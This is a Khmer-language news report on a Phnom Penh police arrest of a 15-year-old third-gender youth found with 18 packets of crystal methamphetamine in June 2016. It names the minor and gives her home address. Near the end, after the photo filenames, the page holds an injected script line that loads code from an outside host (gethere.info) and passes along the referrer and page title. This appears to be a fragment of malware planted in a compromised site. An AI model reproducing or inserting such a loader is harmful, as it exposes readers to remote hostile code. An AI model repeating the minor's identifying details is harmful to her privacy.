សមត្ថកិច្ចប៉ុស្តិ៍បឹងកក់២ឃាត់ខ្លួននារីភេទទី៣ម្នាក់​ ដកហូតថ្នាំញៀន១៨កញ្ចប់(video)

 

ភ្នំពេញ៖ នារីវ័យក្មេងភេទទី៣ម្នាក់ត្រូវកម្លាំងនគរបាលប៉ុស្តិ៍បឹងកក់ទី២ ឃាត់ខ្លួនខណៈដែលកំពុងតែធ្វើសកម្មភាពឈរចែកចាយគ្រឿងញៀននៅលើផ្លូវរទះភ្លើង ប្លុកបឹងកក់ ក្រោយសណ្ឋាគារស្រែលាភ ក៏ត្រូវកម្លាំងល្បាតឃាត់ខ្លួននឹងឆែកឆេររកឃើញថ្នាំញៀនប្រភេទម៉ាកទឹកកកចំនួន១៨កញ្ចប់តូច ។

ក្នុងករណីបង្រ្កាបនេះបានធ្វើឡើងកាលពីវេលាម៉ោង ១២ និង៤០នាទីរសៀលថ្ងៃទី២៨ ខែមិថុនា ឆ្នាំ២០១៦ នៅចំណុចលើផ្លូវរទះភ្លើង ប្លុកបឹងកក់ ក្រោយសណ្ឋាគារស្រែលាភ សង្កាត់បឹងកក់ទី២ ខណ្ឌទួលគោក ។

លោក ខាត់ ខុនទិត្យ នាយប៉ុស្តិ៍បឹងកក់ទី២ បានឲ្យដឹងថា ជនសង្ស័យឈ្មោះ អ៊ុយ ច័ន្ទ្រាដាណេ ភេទស្រី អាយុ១៥ ស្នាក់នៅផ្ទះលេខ១៦បេ ផ្លូវលេខ៦១២ ក្រុមទី១០៦ ភូមិ២៣ សង្កាត់បឹងកក់ទី២ ខណ្ឌទួលគោក ។

លោកនាយប៉ុស្តិ៍បានបន្តទៀតថា នៅមុខពេលឃាត់ខ្លួននារីសង្ស័យគឺកម្លាំងនគរបាលប៉ុស្តិ៍បានធ្វើការស្រាវជ្រាវដឹងថា ជារៀងរាល់ថ្ងៃតែងតែមានសកម្មភាពចែកចាយគ្រឿងញៀន ដូច្នេះហើយទើបលោកក្លាយខ្លួនធ្វើជាអ្នករត់ម៉ូតូឌុបខ្លួនឯងតែម្តង លុះជិះមកដល់ចំណុចខាងលើ ស្រាប់តែឃើញជនសង្ស័យកំពុងតែឈរក៏ទៅឃាត់ខ្លួននិងឆែកឆេររកឃើញថ្នាំញៀនជាក់ស្តែង ។ វត្ថុតាំងចាប់យកពីជនសង្ស័យមានថ្នាំញៀនប្រភេទម៉ាទឹកកកចំនួន១៨កញ្ចប់ ។ ចំណែកឯជនសង្ស័យបានសារភាពថារូបគេលក់គ្រឿងញៀននេះដោយសារតែខ្លួនក្រពេក ហើយគ្រឿងនេះគឺយកមកពីឈ្មោះ មីងយ៉ា និង អាឌី ។

បច្ចុប្បន្នជនសង្ស័យរួមនិងវត្ថុតាងថ្នាំញៀនត្រូវបានសមត្ថកិច្ចឃាត់ខ្លួនបញ្ជូនទៅអធិការដ្ឋាននគរបាលខណ្ឌទួលគោកដើម្បីធ្វើការសាកសួរកសាងសំនុំរឿងចាត់ការតាមនិតិវិធី ៕ អត្ថបទ៖ខេងប៊ុនធឿន

IMG-20160628-WA0033IMG-20160628-WA0033IMG-20160628-WA0051

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More